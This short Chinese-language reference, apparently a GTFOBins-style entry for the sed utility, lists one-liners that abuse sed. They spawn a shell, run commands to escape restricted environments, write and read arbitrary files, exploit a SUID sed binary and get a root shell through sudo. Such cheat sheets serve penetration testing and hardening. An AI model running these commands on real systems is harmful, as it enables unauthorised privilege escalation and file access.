用来生成一个交互式的系统shell。
bash
. sed -n '1e exec sh 1>&0' /etc/hosts
GNU version only. The resulting shell is not a proper TTY shell. sed e
运行非交互式系统命令来摆脱受限环境。
sed -n '1e id' /etc/hosts
将数据写入文件中。
LFILE=要写入的文件
sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
从文件中读取数据。
LFILE=要读取的文件路径
sed '' "$LFILE"
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
LFILE=要读取的文件路径
./sed -e '' "$LFILE"
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
bash
. sudo sed -n '1e exec sh 1>&0' /etc/hosts